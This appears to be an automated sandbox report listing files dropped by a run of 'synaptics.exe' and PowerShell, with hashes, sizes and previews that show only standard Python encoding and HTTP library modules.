                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2401
                                                                                                                                                                                                            Entropy (8bit):5.445287562643166
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:l8HYqr1E0KGxtCOJxDvTk3J9rBDfLTTLTDfLTTp6HbDHT:2HY0EDWtZjr+Jldf33Pf396nz
                                                                                                                                                                                                            MD5:977BBD4C321FEDE12B57C06E7B4D0D14
                                                                                                                                                                                                            SHA1:8AF0A30825AB2B49A8DFE3BD2EE26B55758DEF18
                                                                                                                                                                                                            SHA-256:B7681E2C39D409DFDBD6808FBA42A443E534F8DFC72B8F3FA51BC61916C1D55F
                                                                                                                                                                                                            SHA-512:ECDA7C2B4AE9AAE4D501BEFBB1F407CE22F0048F8C24EEC4C1FF154D62ED1C01960214505585878DD951CADD263641956B48FBA46A342CF63FDD9380DB6A4AC5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.5.......................@...s....d.Z.d.d.l.Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.e.j...Z.G.d.d...d.e.e.j...Z.d.d...Z.d.Z.e...e...Z.d.S.).zv Python Character Mapping Codec cp1252 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1252.TXT' with gencodec.py........Nc....................@...s ...e.Z.d.Z.d.d.d...Z.d.d.d...Z.d.S.)...Codec..strictc....................C........t...|.|.t...S...N)...codecs..charmap_encode..encoding_table....self..input..errors..r.....?C:\Users\user\AppData\Local\xFSOj9El1Q\lib\encodings\cp1252.py..encode...........z.Codec.encodec....................C...r....r....).r......charmap_decode..decoding_tabler....r....r....r......decode....r....z.Codec.decodeN).r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r........s..........r....c....................@........e.Z.d.Z.d.d.d...Z.d.S.)...IncrementalEncoderFc....................C........t...|.|.j.t...d...S...Nr....).r....r....r....r......r....r......fin
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5623
                                                                                                                                                                                                            Entropy (8bit):5.2347580780769345
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:VD5boZ0Mq9d9y50Om16wQNWLT1arA5fCAFK5n4NcJwp7ogXdB:5VoZ0n9d92Dm1rQNWL8s5aZocJwpJNB
                                                                                                                                                                                                            MD5:C7BBB7A60C3FBE75472EDAAEBA5E8FB8
                                                                                                                                                                                                            SHA1:09137598401073BDBC71DB93C6CED531E67A8630
                                                                                                                                                                                                            SHA-256:1FBE9E39D408817DC817C2D0F2D3754D9B4F3E9907964B7A067C326127A5DB43
                                                                                                                                                                                                            SHA-512:27FB7E05B33149785157E939611B084D4B656101D208A255BC763EEE66CE4822FD5C01F465F1AFC119F78546D2911CEF21098FCA36A985C191F6D49078D58E88
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.$.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e...d...Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.e.j...Z.G.d.d...d.e.e.j...Z.d.d...Z.d.S.)......N)...ucd_3_2_0u....[....]s....xn--z.xn--c....................C...s....g.}.|.D.].}.t...|...r.q.|...t...|.......q.d...|...}.t...d.|...}.|.D.]5}.t...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...rWt.d.|.......q"d.d...|.D...}.t.|...r|t.d.d...|.D.....rpt.d.....|.d...rx|.d...s|t.d.....|.S.).N....NFKCz.Invalid character %rc....................S...s....g.|.].}.t...|.....q.S...)...stringprepZ.in_table_d1.....0..xr....r.....=C:\Users\user\AppData\Local\xFSOj9El1Q\lib\encodings\idna.py..<listcomp>)...s......z.nameprep.<locals>.<listcomp>c....................s...s......|.].}.t...|...V...q.d.S.).N).r....Z.in_table_d2r....r....r....r......<genexpr>1...s........z.nameprep.<locals>.<genexpr>z.Violation of BIDI requirement 2r
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1621
                                                                                                                                                                                                            Entropy (8bit):4.736923584683451
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:ld2Vtus1piplKHUrYPyaGcLXaLOsJkLBBn1U:ebuWPHUPNcLXaasmP1U
                                                                                                                                                                                                            MD5:C25AA59E91C10911AB436E0676BB7580
                                                                                                                                                                                                            SHA1:497259343263A217AD13E71F72C405A68D587128
                                                                                                                                                                                                            SHA-256:24F3C35481BE2C4511BEC37169799686439EB58167B2D855F2BAC218E563D944
                                                                                                                                                                                                            SHA-512:B6DE5945346A8A7ECA3B9B968DD500107572B88689498BFDDE8C93B43A9FD82C222378E5677F72B2895CF7764E60FA76BAA84DDB51920231A0A11D866678BC7B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sp...d.Z.d.d.l.Z.e.j.Z.d.d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.d...Z.d.S.).z. Python 'utf-8' Codec...Written by Marc-Andre Lemburg (mal@lemburg.com)...(c) Copyright CNRI, All Rights Reserved. NO WARRANTY........N..strictc....................C...s....t...|.|.d...S.).NT)...codecs..utf_8_decode)...input..errors..r.....>C:\Users\user\AppData\Local\xFSOj9El1Q\lib\encodings\utf_8.py..decode....s......r....c....................@...s....e.Z.d.Z.d.d.d...Z.d.S.)...IncrementalEncoderFc....................C...s....t...|.|.j...d...S.).Nr....).r......utf_8_encoder....)...selfr......finalr....r....r......encode....s......z.IncrementalEncoder.encodeN).F)...__name__..__module__..__qualname__r....r....r....r....r....r........s........r....c....................@........e.Z.d.Z.e.j.Z.d.S.)...IncrementalDecoderN).r....r....r....r....r......_buffer_decoder....r....r....r....r.................r....c....................@...r
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16228
                                                                                                                                                                                                            Entropy (8bit):4.043924236672622
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:ojm3001RTSvqNLtEBLKSyhNM4Bu7fbROCVLD6S+:oMReiNLtEB+Syhi4Bu7zHVLud
                                                                                                                                                                                                            MD5:FF23F6BB45E7B769787B0619B27BC245
                                                                                                                                                                                                            SHA1:60172E8C464711CF890BC8A4FECCFF35AA3DE17A
                                                                                                                                                                                                            SHA-256:1893CFB597BC5EAFD38EF03AC85D8874620112514EB42660408811929CC0D6F8
                                                                                                                                                                                                            SHA-512:EA6B685A859EF2FCD47B8473F43037341049B8BA3EEA01D763E2304A2C2ADDDB01008B58C14B4274D9AF8A07F686CD337DE25AFEB9A252A426D85D3B7D661EF9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:""" Encoding Aliases Support.... This module is used by the encodings package search function to.. map encodings names to module names..... Note that the search function normalizes the encoding names before.. doing the lookup, so the mapping will have to map normalized.. encoding names to module names..... Contents:.... The following aliases dictionary contains mappings of all IANA.. character set names for which the Python core library provides.. codecs. In addition to these, a few Python specific codec.. aliases have also been added....."""..aliases = {.... # Please keep this list sorted alphabetically by value !.... # ascii codec.. '646' : 'ascii',.. 'ansi_x3.4_1968' : 'ascii',.. 'ansi_x3_4_1968' : 'ascii', # some email headers use this non-standard name.. 'ansi_x3.4_1986' : 'ascii',.. 'cp367' : 'ascii',.. 'csascii' : 'ascii',.. 'ibm367' : 'ascii',.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1298
                                                                                                                                                                                                            Entropy (8bit):4.6538766905589
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:JASEHV0yWoyWFmSMufQRhQFmBUQWSJzWSJDtyWFmtyWz9ZKj951QJxlTpf:JASdue6SJ6SJ8TKxQJxHf
                                                                                                                                                                                                            MD5:FF48C6334861799D8D554F5D2A30BA00
                                                                                                                                                                                                            SHA1:08520B19D0353712CDFD919B3694945678C3D2D7
                                                                                                                                                                                                            SHA-256:698C578B9B5DF7BD6F8B2761D114F74CFF854C1396083C8AB912B11FCAE83B86
                                                                                                                                                                                                            SHA-512:087A0E1BA9D9CA2C2F51F0156AD0ADA1D1EB7CCBA8B46159B95779B053D2431FC52BA1CA57FEC381EA044A7F0E41490B5389B1AF2DBF513C35CC1B29997FEE6E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:""" Python 'ascii' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....class Codec(codecs.Codec):.... # Note: Binding these as C functions will result in the class not.. # converting them to methods. This is intended... encode = codecs.ascii_encode.. decode = codecs.ascii_decode....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.ascii_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.ascii_decode(input, self.errors)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....class StreamConverter(StreamWriter,StreamReader):.... encode = codecs.ascii_decode.. decode = codecs.ascii_encode....### encodings module API....def getreg
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1588
                                                                                                                                                                                                            Entropy (8bit):4.646022236658084
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:XDpo1AIxDc1AIxj1i1uuMP9vIvPTKqPJxHjH:XVo/xDc/xjoMu2A3TK0rH
                                                                                                                                                                                                            MD5:46F8E67E43DAC28160F47E3870B39365
                                                                                                                                                                                                            SHA1:0B1A69175889E5D4603C616EBD6E7EC456C6ABCB
                                                                                                                                                                                                            SHA-256:AC4443CEB3E045F064335AED4C9C2143F1C256DDD25AAA5A9DB4B5EE1BCCF694
                                                                                                                                                                                                            SHA-512:CFEA01544E998CAED550B37B61439014D0BA6D707068F1D7E4726A6AC8F4B8B81C2E7ED3A5DFB76687D1FDBCD7EC2DC6C5047D8061ECCBC8A59A4587FCBED253
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Python 'base64_codec' Codec - base64 content transfer encoding.....This codec de/encodes from bytes to bytes.....Written by Marc-Andre Lemburg (mal@lemburg.com)..."""....import codecs..import base64....### Codec APIs....def base64_encode(input, errors='strict'):.. assert errors == 'strict'.. return (base64.encodebytes(input), len(input))....def base64_decode(input, errors='strict'):.. assert errors == 'strict'.. return (base64.decodebytes(input), len(input))....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return base64_encode(input, errors).. def decode(self, input, errors='strict'):.. return base64_decode(input, errors)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. assert self.errors == 'strict'.. return base64.encodebytes(input)....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. assert self.errors
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1058
                                                                                                                                                                                                            Entropy (8bit):4.522034261788674
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:nUqj2Oz6f/XoBKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9sAcJxFplR:UqvLV62VJjRU8njOxLnrxLbrLKaJxTz
                                                                                                                                                                                                            MD5:9AE0A356995140BFF35627C45E7DA1B8
                                                                                                                                                                                                            SHA1:7A23003577D29B3470BEE6EE996EAA2EA120FDD3
                                                                                                                                                                                                            SHA-256:CADB1C66D355F551E4D99A895725B62211CC5CBDE1F037C61FD4463932FF70CB
                                                                                                                                                                                                            SHA-512:F8764CFB30BD5EE67B527DC0FF5E70E41F03D617EF3AB0A3DE021825B751105373A251919E00A9F5C4F581471B393565A51C3B09B4CD1BD11BD8EBBA37545B42
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:#..# big5.py: Python Unicode Codec for BIG5..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_tw, codecs..import _multibytecodec as mbc....codec = _codecs_tw.getcodec('big5')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='big5',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1078
                                                                                                                                                                                                            Entropy (8bit):4.563261678208351
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:nCqjMOzCf/XophKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9s2cJxFpz:CqZjp162VJjRU8njOxLnrxLbrLKKJxTz
                                                                                                                                                                                                            MD5:DB9A713E27FB20F00437D9DAB32C1FAC
                                                                                                                                                                                                            SHA1:E7E0DAF3371FDC04C5DA6DFB0F9D1B93BC44620F
                                                                                                                                                                                                            SHA-256:7FCF88553A656ABE5E4DC1A8E89D1E279DDEC83DE79E22F971AC04E7632708E9
                                                                                                                                                                                                            SHA-512:AAA035F5C5930233004855D9876B87D95FFAA5B8CE21F62FB499966BB8F29B5A5F4BF501FAC5013F5E8CA8F9D1DE8A0F1A288E346A87EF52BA2AF43AEB56E500
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:#..# big5hkscs.py: Python Unicode Codec for BIG5HKSCS..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_hk, codecs..import _multibytecodec as mbc....codec = _codecs_hk.getcodec('big5hkscs')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='big5hkscs',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2327
                                                                                                                                                                                                            Entropy (8bit):4.640437967116185
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:XT1NsDZd91AIFjz1AIo31951TuY51w6P7z0/51wz2xth+yvIvPTK2yJxHjH:XxeDZX/Fjz/o3JNuY5H7zq53thA3TKvD
                                                                                                                                                                                                            MD5:1AA105E7EED39A1B52B24B524B541AB0
                                                                                                                                                                                                            SHA1:9DE4EB2157EF2D0339EB565B0BD2AD6DBA1172B3
                                                                                                                                                                                                            SHA-256:A0A34436976BB5137403C148CB8B332653F14CAA6CDF102150E82646D5249A5E
                                                                                                                                                                                                            SHA-512:CDA0CDAA96ECC52F5D57C9CA9D118B90D2E93630D47ED9CB99E0BA07A40D03470872676CB00B7DEE70089045E9AAB3BF37AF09DF075B7C5212947C9A17F66979
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Python 'bz2_codec' Codec - bz2 compression encoding.....This codec de/encodes from bytes to bytes and is therefore usable with..bytes.transform() and bytes.untransform().....Adapted by Raymond Hettinger from zlib_codec.py which was written..by Marc-Andre Lemburg (mal@lemburg.com)..."""....import codecs..import bz2 # this codec needs the optional bz2 module !....### Codec APIs....def bz2_encode(input, errors='strict'):.. assert errors == 'strict'.. return (bz2.compress(input), len(input))....def bz2_decode(input, errors='strict'):.. assert errors == 'strict'.. return (bz2.decompress(input), len(input))....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return bz2_encode(input, errors).. def decode(self, input, errors='strict'):.. return bz2_decode(input, errors)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict'):.. assert errors == 'strict'.. self.errors = errors..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2153
                                                                                                                                                                                                            Entropy (8bit):4.704086253537808
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:ad1E6SbuY5qRl45qrO6SA13MNOg106SA13MNOo1tRTKyQJxHf:adKlbuY5qRl45qrOW13Mkg2y13MooDRm
                                                                                                                                                                                                            MD5:8A14214EF1C47A40C56C08A793FC9923
                                                                                                                                                                                                            SHA1:73205DCA66A87C26464472C25D39795BFFF46F88
                                                                                                                                                                                                            SHA-256:1EA641E7C63C0A022A663F5D2024A71124272E088C246583D2D44CDDDF548A32
                                                                                                                                                                                                            SHA-512:D7E94201E8168043BE5BD6D1CE5B0720E653EC84A7ABBEAB6F99781228435C590D75B1FE3AE58B700287E6AABC7A44DA4059561F22317B7A529263E1AD2A3C8F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:""" Generic Python Character Mapping Codec..... Use this codec directly rather than through the automatic.. conversion mechanisms supplied by unicode() and .encode().......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... # Note: Binding these as C functions will result in the class not.. # converting them to methods. This is intended... encode = codecs.charmap_encode.. decode = codecs.charmap_decode....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict', mapping=None):.. codecs.IncrementalEncoder.__init__(self, errors).. self.mapping = mapping.... def encode(self, input, final=False):.. return codecs.charmap_encode(input, self.errors, self.mapping)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def __init__(self, errors='strict', mapping=None):.. c
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13428
                                                                                                                                                                                                            Entropy (8bit):4.523742655695844
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:HHhsuOTDvR6UZkPS9BC4KNVFIhRNvcE8bV2H2QB:KT7C4PRcE8bgWQB
                                                                                                                                                                                                            MD5:A28DE4284DFAEFEC5CF40EE279C388F3
                                                                                                                                                                                                            SHA1:5EEF5925AC2C77227A03067E17808B5F10C41018
                                                                                                                                                                                                            SHA-256:FA3FF4B328C72315EC622CD62FEAC21189A3C85BCC675552D0EC46677F16A42C
                                                                                                                                                                                                            SHA-512:8FD7FD3C0A099A5851E9A06B10D6B44F29D4620426A04AE008EB484642C99440571D1C2C52966D972C2C91681EBD1C9BF524B99582D48E707719D118F4CD004A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:""" Python Character Mapping Codec cp037 generated from 'MAPPINGS/VENDORS/MICSFT/EBCDIC/CP037.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp037',.. e
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6440
                                                                                                                                                                                                            Entropy (8bit):5.804377268076172
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:mWZsdAX4kaBaNzpZOZBDcxHN/8O2OHb4k7:m+zpZOZBDcpNp2iT
                                                                                                                                                                                                            MD5:E7276B8D9C5A4399EE2CD11AD2731B05
                                                                                                                                                                                                            SHA1:295D06CCA566D7B730B1085B444DBAF35408185F
                                                                                                                                                                                                            SHA-256:5A8540BF4351C20CCF81130159992FC5169617299BE0CE16B5566520163B307D
                                                                                                                                                                                                            SHA-512:F97CFA5A3D7379B9ABFD283E9C142E651AC872ADBFAEED05C242883AD741B083CBB0ED32694CA6561DCF16D31DCFE4E2DF43943CE5EF367416A74434D6B62DE2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s&...d.d.l.m.Z...d.g.Z.G.d.d...d.e...Z.d.S.)......)...IntEnum..HTTPStatusc....................@...s....e.Z.d.Z.d.Z.dDd.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z d!Z!d"Z"d#Z#d$Z$d%Z%d&Z&d'Z'd(Z(d)Z)d*Z*d+Z+d,Z,d-Z-d.Z.d/Z/d0Z0d1Z1d2Z2d3Z3d4Z4d5Z5d6Z6d7Z7d8Z8d9Z9d:Z:d;Z;d<Z<d=Z=d>Z>d?Z?d@Z@dAZAdBZBdCS.)Er....aG...HTTP status codes and reason phrases.. Status codes from the following RFCs are all observed:.. * RFC 7231: Hypertext Transfer Protocol (HTTP/1.1), obsoletes 2616. * RFC 6585: Additional HTTP Status Codes. * RFC 3229: Delta encoding in HTTP. * RFC 4918: HTTP Extensions for WebDAV, obsoletes 2518. * RFC 5842: Binding Extensions to WebDAV. * RFC 7238: Permanent Redirect. * RFC 2295: Transparent Content Negotiation in HTTP. * RFC 2774: An HTTP Extension Framework. * RFC 7725: An HTTP Status Code to Rep
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):35202
                                                                                                                                                                                                            Entropy (8bit):5.38016026621937
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:IoG3ovqgYyeQcyEqVHpu/TTaC5TCW9ObjcDds:jG3hgYyeQcyEqVHpETH5Tj9UjYC
                                                                                                                                                                                                            MD5:5E6AA999C7CE8DF9CC5EE918715C9F83
                                                                                                                                                                                                            SHA1:28D30E489B674CF4FDB18DDC856A5732124F9C09
                                                                                                                                                                                                            SHA-256:01D32519F4D2BCA22760807DE6E6AF1D070D3B056910D5AC2F6FE034D4B9D83E
                                                                                                                                                                                                            SHA-512:360CF2AAA732BC88D05C15E730E07C4418FF22D49AAB65FF6D02326AB7F346BE41841559D6313FEF2E0F8B8E685DB1D6EA27156EB6F12B453637516AB1D36DA4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sP...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.....e.j.j.....d.d...e.j.j.....D...Z.d.Z.d.Z.e...d...j.Z.e...d...j Z!e...d...Z"e...d...Z#h.d...Z$d?d.d...Z%G.d.d...d.e.j&j'..Z(d.d...Z)e(f.d.d...Z*G.d.d...d.e.j+..Z,G.d.d ..d ..Z-z.d.d.l.Z.W.n...e/y.......Y.n.w.G.d!d"..d"e-..Z0e..1d"....G.d#d$..d$e2..Z3G.d%d&..d&e3..Z4G.d'd(..d(e3..Z5G.d)d*..d*e3..Z6G.d+d,..d,e3..Z7G.d-d...d.e3..Z8G.d/d0..d0e3..Z9G.d1d2..d2e3..Z:G.d3d4..d4e:..Z;G.d5d6..d6e:..Z<G.d7d8..d8e:..Z=G.d9d:..d:e3..Z>G.d;d<..d<e3..Z?G.d=d>..d>e@e>..ZAe3ZBd.S.)@a....HTTP/1.1 client library..<intro stuff goes here>.<other stuff, too>..HTTPConnection goes through a number of "states", which define when a client.may legally make another request or fetch the response for a particular.request. This diagram details these state transitions:.. (null). |. | HTTPConnection(). v. Idle. |. | putr
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):53464
                                                                                                                                                                                                            Entropy (8bit):5.564456187273416
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:lB95TRGXx0wM1oyXc63+Rb+TXzpTrY/hgRkOfmXULJn0MFgddqRGfUehMJutkvPK:jAI1FXZ+R+ZyhXd6x8MMT
                                                                                                                                                                                                            MD5:D55E816665F2BBA359EB226BF2B0FA3F
                                                                                                                                                                                                            SHA1:CC638A95FD703B12186FB0A182AB60C641F1E1DA
                                                                                                                                                                                                            SHA-256:AC00F27E6CC4938DFA36E92E84733F8993C548B29A1D4422935D4A31CBF0D5D9
                                                                                                                                                                                                            SHA-512:D9DA51A4950D4B23C8CFD79F11010A5C50D1D68A5AF40E6CD9DB7114674B4B90199572D61EC4F11F4F9276C14AE96A85D81D2DF7CEEC2BC73BEDA9AC0B56EA2D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
